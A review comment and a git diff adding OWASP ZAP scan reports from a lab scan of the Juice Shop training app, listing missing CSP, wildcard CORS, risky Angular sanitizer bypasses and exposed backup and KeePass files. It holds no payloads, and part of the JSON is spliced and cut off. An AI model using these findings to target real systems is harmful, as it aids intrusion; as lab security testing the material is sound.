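Review bot: the summary line ends with FAIL-NEW: 0 only because none of the ten WARN-NEW rules is configured to fail, so this run would pass a CI gate even with the CSP header missing (10038) and the Cross-Domain Misconfiguration (10098) present; if the lab's gate is meant to be enforced, add a rules config file (the `-c` option of the ZAP baseline/full scan scripts) that sets those plugin ids to FAIL, or record in the lab notes that the run is informational only. Also, for a file named zap-auth-run.log, nothing here shows that the authenticated context took effect: "Authentication Request Identified [10111]" and "Session Management Response Identified [10112]" are both PASS, meaning neither rule found anything, and the "Total of 95 URLs" figure should be compared against the unauthenticated run before this log is treated as evidence of an authenticated scan.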
diff --git a/labs/lab5/zap/zap-report-auth.json b/labs/lab5/zap/zap-report-auth.json
new file mode 100644
index 00000000..8041b8fa
--- /dev/null
+++ b/labs/lab5/zap/zap-report-auth.json
@@ -0,0 +1,1179 @@
+{
+ "@programName": "ZAP",
+ "@version": "2.16.1",
+ "@generated": "Fri, 8 May 2026 08:45:34",
+ "created": "2026-05-08T08:45:34.330601898Z",
+ "site":[
+ {
+ "@name": "http://localhost:3000",
+ "@host": "localhost",
+ "@port": "3000",
+ "@ssl": "false",
+ "alerts": [
+ {
+ "pluginid": "10038",
+ "alertRef": "10038-1",
+ "alert": "Content Security Policy (CSP) Header Not Set",
+ "name": "Content Security Policy (CSP) Header Not Set",
+ "riskcode": "2",
+ "confidence": "3",
+ "riskdesc": "Medium (High)",
+ "desc": "
The following pattern was used: \\bQUERY\\b and was detected in likely comment: \"//owasp.org' target='_blank'>Open Worldwide Application Security Project (OWASP) and is developed and maintained by voluntee\", see evidence field for the suspicious comment/snippet.
", + "reference": "", + "cweid": "615", + "wascid": "13", + "sourceid": "22" + }, + { + "pluginid": "10109", + "alertRef": "10109", + "alert": "Modern Web Application", + "name": "Modern Web Application", + "riskcode": "0", + "confidence": "2", + "riskdesc": "Informational (Medium)", + "desc": "The application appears to be a modern web application. If you need to explore it automatically then the Ajax Spider may well be more effective than the standard one.
", + "instances":[ + { + "id": "19", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "59", + "uri": "http://localhost:3000/", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "53", + "uri": "http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "64", + "uri": "http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "72", + "uri": "http://localhost:3000/juice-shop/build/routes/fileServer.js:59:18", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "70", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:328:13", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." 
+ }, + { + "id": "71", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:365:14", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "74", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:376:14", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "73", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:421:3", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "69", + "uri": "http://localhost:3000/juice-shop/node_modules/serve-index/index.js:145:39", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "20", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + } + ], + "count": "11", + "systemic": false, + "solution": "This is an informational alert and so no changes are required.
", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application.
", + "reference": "", + "cweid": "-1", + "wascid": "-1", + "sourceid": "1" + }, + { + "pluginid": "10049", + "alertRef": "10049-1", + "alert": "Non-Storable Content", + "name": "Non-Storable Content", + "riskcode": "0", + "confidence": "2", + "riskdesc": "Informational (Medium)", + "desc": "The response contents are not storable by caching components such as proxy servers. If the response does not contain sensitive, personal or user-specific information, it may benefit from being stored and cached, to improve performance.
", + "instances":[ + { + "id": "82", + "uri": "http://localhost:3000/ftp", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "authorization:", + "otherinfo": "" + }, + { + "id": "104", + "uri": "http://localhost:3000/ftp/coupons_2013.md.bak", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "authorization:", + "otherinfo": "" + }, + { + "id": "103", + "uri": "http://localhost:3000/ftp/package-lock.json.bak", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "authorization:", + "otherinfo": "" + }, + { + "id": "75", + "uri": "http://localhost:3000/robots.txt", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "authorization:", + "otherinfo": "" + } + ], + "count": "4", + "systemic": false, + "solution": "The content may be marked as storable by ensuring that the following conditions are satisfied:
The request method must be understood by the cache and defined as being cacheable (\"GET\", \"HEAD\", and \"POST\" are currently defined as cacheable)
The response status code must be understood by the cache (one of the 1XX, 2XX, 3XX, 4XX, or 5XX response classes are generally understood)
The \"no-store\" cache directive must not appear in the request or response header fields
For caching by \"shared\" caches such as \"proxy\" caches, the \"private\" response directive must not appear in the response
For caching by \"shared\" caches such as \"proxy\" caches, the \"Authorization\" header field must not appear in the request, unless the response explicitly allows it (using one of the \"must-revalidate\", \"public\", or \"s-maxage\" Cache-Control response directives)
In addition to the conditions above, at least one of the following conditions must also be satisfied by the response:
It must contain an \"Expires\" header field
It must contain a \"max-age\" response directive
For \"shared\" caches such as \"proxy\" caches, it must contain a \"s-maxage\" response directive
It must contain a \"Cache Control Extension\" that allows it to be cached
It must have a status code that is defined as cacheable by default (200, 203, 204, 206, 300, 301, 404, 405, 410, 414, 501).
", + "otherinfo": "", + "reference": "https://datatracker.ietf.org/doc/html/rfc7234
https://datatracker.ietf.org/doc/html/rfc7231
https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html
", + "cweid": "524", + "wascid": "13", + "sourceid": "24" + }, + { + "pluginid": "10049", + "alertRef": "10049-2", + "alert": "Storable but Non-Cacheable Content", + "name": "Storable but Non-Cacheable Content", + "riskcode": "0", + "confidence": "2", + "riskdesc": "Informational (Medium)", + "desc": "The response contents are storable by caching components such as proxy servers, but will not be retrieved directly from the cache, without validating the request upstream, in response to similar requests from other users.
", + "instances":[ + { + "id": "86", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "99", + "uri": "http://localhost:3000/", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "105", + "uri": "http://localhost:3000/ftp/legal.md", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "76", + "uri": "http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "80", + "uri": "http://localhost:3000/polyfills.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "91", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "98", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + } + ], + "count": "7", + "systemic": false, + "solution": "", + "otherinfo": "", + "reference": "https://datatracker.ietf.org/doc/html/rfc7234
https://datatracker.ietf.org/doc/html/rfc7231
https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html
", + "cweid": "524", + "wascid": "13", + "sourceid": "1" + } + ] + } + ], + "sequences":[ + ] + +} diff --git a/labs/lab5/zap/zap-report-noauth.json b/labs/lab5/zap/zap-report-noauth.json new file mode 100644 index 00000000..a18ff439 --- /dev/null +++ b/labs/lab5/zap/zap-report-noauth.json @@ -0,0 +1,1609 @@ +{ + "@programName": "ZAP", + "@version": "2.16.1", + "@generated": "Mon, 13 Apr 2026 08:58:22", + "created": "2026-04-13T08:58:22.877184068Z", + "site":[ + { + "@name": "http://localhost:3000", + "@host": "localhost", + "@port": "3000", + "@ssl": "false", + "alerts": [ + { + "pluginid": "10038", + "alertRef": "10038-1", + "alert": "Content Security Policy (CSP) Header Not Set", + "name": "Content Security Policy (CSP) Header Not Set", + "riskcode": "2", + "confidence": "3", + "riskdesc": "Medium (High)", + "desc": "Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware. CSP provides a set of standard HTTP headers that allow website owners to declare approved sources of content that browsers should be allowed to load on that page \u2014 covered types are JavaScript, CSS, HTML frames, fonts, images and embeddable objects such as Java applets, ActiveX, audio and video files.
", + "instances":[ + { + "id": "4", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "107", + "uri": "http://localhost:3000/", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "93", + "uri": "http://localhost:3000/ftp", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "95", + "uri": "http://localhost:3000/ftp/coupons_2013.md.bak", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "77", + "uri": "http://localhost:3000/ftp/eastere.gg", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "81", + "uri": "http://localhost:3000/ftp/encrypt.pyc", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "94", + "uri": "http://localhost:3000/ftp/package-lock.json.bak", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "83", + "uri": "http://localhost:3000/ftp/package.json.bak", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "89", + "uri": "http://localhost:3000/ftp/suspicious_errors.yml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "103", + "uri": "http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "79", + "uri": "http://localhost:3000/juice-shop/build/routes/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + 
"evidence": "", + "otherinfo": "" + }, + { + "id": "102", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "87", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "111", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:286:9", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "109", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:376:14", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "106", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/layer.js:95:5", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "98", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/runtime.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "80", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "100", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/vendor.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "104", + "uri": "http://localhost:3000/juice-shop/node_modules/serve-index/assets/public/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + 
"param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "99", + "uri": "http://localhost:3000/juice-shop/node_modules/serve-index/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "13", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + } + ], + "count": "22", + "systemic": false, + "solution": "Ensure that your web server, application server, load balancer, etc. is configured to set the Content-Security-Policy header.
", + "otherinfo": "", + "reference": "https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP
https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html
https://www.w3.org/TR/CSP/
https://w3c.github.io/webappsec-csp/
https://web.dev/articles/csp
https://caniuse.com/#feat=contentsecuritypolicy
https://content-security-policy.com/
", + "cweid": "693", + "wascid": "15", + "sourceid": "1" + }, + { + "pluginid": "10098", + "alertRef": "10098", + "alert": "Cross-Domain Misconfiguration", + "name": "Cross-Domain Misconfiguration", + "riskcode": "2", + "confidence": "2", + "riskdesc": "Medium (Medium)", + "desc": "Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server.
", + "instances":[ + { + "id": "5", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Access-Control-Allow-Origin: *", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing." + }, + { + "id": "78", + "uri": "http://localhost:3000/ftp/eastere.gg", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Access-Control-Allow-Origin: *", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing." + }, + { + "id": "75", + "uri": "http://localhost:3000/ftp/incident-support.kdbx", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Access-Control-Allow-Origin: *", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. 
This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing." + }, + { + "id": "17", + "uri": "http://localhost:3000/main.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Access-Control-Allow-Origin: *", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing." + }, + { + "id": "1", + "uri": "http://localhost:3000/runtime.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Access-Control-Allow-Origin: *", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing." + }, + { + "id": "14", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Access-Control-Allow-Origin: *", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. 
Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing." + }, + { + "id": "9", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Access-Control-Allow-Origin: *", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing." + }, + { + "id": "18", + "uri": "http://localhost:3000/vendor.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Access-Control-Allow-Origin: *", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing." + } + ], + "count": "8", + "systemic": false, + "solution": "Ensure that sensitive data is not available in an unauthenticated manner (using IP address white-listing, for instance).
Configure the \"Access-Control-Allow-Origin\" HTTP header to a more restrictive set of domains, or remove all CORS headers entirely, to allow the web browser to enforce the Same Origin Policy (SOP) in a more restrictive manner.
", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
", + "reference": "https://vulncat.fortify.com/en/detail?category=HTML5&subcategory=Overly%20Permissive%20CORS%20Policy
", + "cweid": "264", + "wascid": "14", + "sourceid": "1" + }, + { + "pluginid": "10017", + "alertRef": "10017", + "alert": "Cross-Domain JavaScript Source File Inclusion", + "name": "Cross-Domain JavaScript Source File Inclusion", + "riskcode": "1", + "confidence": "2", + "riskdesc": "Low (Medium)", + "desc": "The page includes one or more script files from a third-party domain.
", + "instances":[ + { + "id": "6", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "7", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "113", + "uri": "http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "118", + "uri": "http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "82", + "uri": "http://localhost:3000/juice-shop/build/routes/styles.css", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "86", + "uri": "http://localhost:3000/juice-shop/build/routes/styles.css", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "90", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/styles.css", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "92", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/styles.css", + "nodeName": null, 
+ "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "115", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/runtime.js", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "117", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/runtime.js", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "84", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/styles.css", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "96", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/styles.css", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "112", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/vendor.js", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "120", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/vendor.js", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "116", + "uri": "http://localhost:3000/juice-shop/node_modules/serve-index/styles.css", + "nodeName": null, + "method": "GET", + 
"param": "//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "140", + "uri": "http://localhost:3000/juice-shop/node_modules/serve-index/styles.css", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "15", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "16", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + } + ], + "count": "18", + "systemic": false, + "solution": "Ensure JavaScript source files are loaded from only trusted sources, and the sources can't be controlled by end users of the application.
", + "otherinfo": "", + "reference": "", + "cweid": "829", + "wascid": "15", + "sourceid": "1" + }, + { + "pluginid": "10110", + "alertRef": "10110", + "alert": "Dangerous JS Functions", + "name": "Dangerous JS Functions", + "riskcode": "1", + "confidence": "1", + "riskdesc": "Low (Low)", + "desc": "A dangerous JS function seems to be in use that would leave the site vulnerable.
", + "instances":[ + { + "id": "70", + "uri": "http://localhost:3000/main.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "bypassSecurityTrustHtml(", + "otherinfo": "" + }, + { + "id": "73", + "uri": "http://localhost:3000/vendor.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "bypassSecurityTrustHtml(", + "otherinfo": "" + } + ], + "count": "2", + "systemic": false, + "solution": "See the references for security advice on the use of these functions.
", + "otherinfo": "", + "reference": "https://v17.angular.io/guide/security
", + "cweid": "749", + "wascid": "-1", + "sourceid": "22" + }, + { + "pluginid": "10063", + "alertRef": "10063-2", + "alert": "Deprecated Feature Policy Header Set", + "name": "Deprecated Feature Policy Header Set", + "riskcode": "1", + "confidence": "2", + "riskdesc": "Low (Medium)", + "desc": "The header has now been renamed to Permissions-Policy.
", + "instances":[ + { + "id": "53", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "119", + "uri": "http://localhost:3000/ftp/coupons_2013.md.bak", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "105", + "uri": "http://localhost:3000/ftp/eastere.gg", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "110", + "uri": "http://localhost:3000/ftp/encrypt.pyc", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "114", + "uri": "http://localhost:3000/ftp/package-lock.json.bak", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "108", + "uri": "http://localhost:3000/ftp/suspicious_errors.yml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "71", + "uri": "http://localhost:3000/main.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "68", + "uri": "http://localhost:3000/polyfills.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "65", + "uri": "http://localhost:3000/runtime.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "55", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "74", + "uri": 
"http://localhost:3000/vendor.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + } + ], + "count": "11", + "systemic": false, + "solution": "Ensure that your web server, application server, load balancer, etc. is configured to set the Permissions-Policy header instead of the Feature-Policy header.
", + "otherinfo": "", + "reference": "https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Permissions-Policy
https://scotthelme.co.uk/goodbye-feature-policy-and-hello-permissions-policy/
", + "cweid": "16", + "wascid": "15", + "sourceid": "7" + }, + { + "pluginid": "90004", + "alertRef": "90004-2", + "alert": "Insufficient Site Isolation Against Spectre Vulnerability", + "name": "Insufficient Site Isolation Against Spectre Vulnerability", + "riskcode": "1", + "confidence": "2", + "riskdesc": "Low (Medium)", + "desc": "Cross-Origin-Embedder-Policy header is a response header that prevents a document from loading any cross-origin resources that don't explicitly grant the document permission (using CORP or CORS).
